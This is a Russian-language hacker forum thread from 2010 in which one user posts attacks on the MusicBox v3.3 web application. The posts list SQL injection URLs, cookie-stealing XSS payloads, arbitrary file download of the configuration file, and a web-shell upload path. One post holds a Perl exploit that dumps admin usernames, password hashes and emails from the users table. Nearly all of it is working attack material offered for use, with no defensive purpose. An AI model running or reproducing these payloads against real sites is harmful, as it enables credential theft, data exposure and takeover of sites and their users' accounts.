MusicBox v3.3
Пользователи, просматривающие топик: none
|
Зашли как: Guest
|
Имя |
Сообщение |
<< Старые топики Новые топики >> |
|
|
MusicBox v3.3 - 2010-03-31 19:17:02.856666
|
|
|
Ctacok
Сообщений: 38
Оценки: 0
Присоединился: 2009-05-10 13:55:58.663333
|
SQL Injection: /blogs.php?action=edit&newsid=-1+union+select+concat_ws(0x3a,user(),database(),version())+–+ /genre_artists.php?id=-1+union+select+1,2,concat_ws(0x3a,user(),database(),version()),4,5,6,7+–+ Пассивная XSS: /index.php?in=artist&term=%22%3E%3Csсriрt%3Ealert(document.cookie);%3C/sсriрt%3EE&action=search&start=0&x=0&y=0 /index.php?action=top&show=5&type=Artists+order+by+1+–+%22%3E%3Csсriрt%3Ealert(document.cookie);%3C/sсriрt%3E Активная XSS: /member.php?uname=кому будем посылать XSS, в комменты <sсriрt>alert(document.cookie);</sсriрt> По идеи почти каждый параметр уязвим, но охото спать и я пошёл дрыхнуть :o Сплойт писать не стал, права юзера нужны) Завтра утром мб накалякаю. Ах да, /phpinfo.php ;)
|
|
|
RE: MusicBox v3.3 - 2010-04-20 12:23:03.270000
|
|
|
Ctacok
Сообщений: 38
Оценки: 0
Присоединился: 2009-05-10 13:55:58.663333
|
Сплойтенг. http://pastebin.com/HDBXNHbe
#!/usr/bin/perl
use LWP::Simple;
print "\n";
print "##############################################################\n";
print "# MusicBox v 3.3 SQL INJECTION EXPLOIT #\n";
print "# Author: Ctacok (Russian) #\n";
print "# Special for Antichat (forum.antichat.ru) and xakep.ru #\n";
print "##############################################################\n";
print "\n Usage: exploit.pl [host] [path] ";
print "\n EX : exploit.pl www.localhost.com /path/ \n\n";
print "\n userlevel 9 = SuperAdmin ";
print "\n pass = md5($pass)";
if (@ARGV < 2)
{
exit;
}
$host=$ARGV[0];
$path=$ARGV[1];
$vuln = "-1+union+select+1,2,concat(0x3a3a3a,userid,0x3a,username,0x3a,password,0x3a,email,0x3a,userlevel,0x3a3a3a),4,5,6,7+from+users+";
$doc = get($host.$path."genre_artists.php?id=".$vuln."--+&by=ASC");
if ($doc =~ /:::(.+):(.+):(.+):(.+):(.+):::/){
print "\n[+] Admin id: : $1";
print "\n[+] Admin username: $2";
print "\n[+] Admin password: $3";
print "\n[+] Admin email: $4";
print "\n[+] Admin userlevel: $5";
}else{
print "\n My name is Fail, Epic Fail... \n"
}
|
|
|
RE: MusicBox v3.3 - 2010-04-21 13:57:02.636666
|
|
|
Ctacok
Сообщений: 38
Оценки: 0
Присоединился: 2009-05-10 13:55:58.663333
|
/news.php?action=edit&newsid=-1+union+select+1,2,3,4,5+–+ /album.php?eid=-1+union+select+1,2,3,4,5,6,7,8,9,10+–+ /blog-detail.php?id=-1+union+select+1,2,3,4,5+–+ /genre_albums.php?id=-1+or(1,1)=(select+count(0),concat((select+database()+from+information_schema.tables+limit+0,1),floor(rand(0)*2))from(information_schema.tables)group+by+2)–+ /news-detail.php?id=-1+union+select+1,2,3,4,5+–+ /songs.php?eid=-1+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19+–+ Need mq off: /images.php?type=album&aid=-1'+union+select+version()+–+ (<img src=5.0.45-community-nt>) /download_songs.php?song=-1%22%3E%3Csсriрt%3Ealert();%3C/sсriрt%3E // Хотя это скуля, ну крутить я нехочу) /mygpic.php?picname=%3C/title%3E%3Csсriрt%3Ealert();%3C/sсriрt%3E /news-detail.php?id=%22%3E%3Csсriрt%3Ealert();%3C/sсriрt%3E Need Register_globals: /directlinking.php?count=1&filename=%22%3E%3Csсriрt%3Ealert();%3C/sсriрt%3E Скачиваем любой файл: /forcedownload.php?file=sources/configure.php – Качаем /forcedownload.php?file=sources/configure.php%00 – Смотрим в браузере /streamm3u.php?file=sources/configure.php – Скачается в формате m3u ;) Раскрытие: /opendir.php "Мы разработчики MusicBox, и мы дураки, взяли блин не поставили проверку на авторизацию, или мы не дураки и оставили эти баги для траффа для хекеров, кароче какую песню хотите такую и редактируйте!" /songs.php?eid=1 Льём шелл: /up.php – помоему баян, видел где-то :) По дефолту в /audio/ – На офф сайте стадо баранов уже видать в теме что залиться через этот файл можно, так что делетнут он там :)
|
|
|
|
|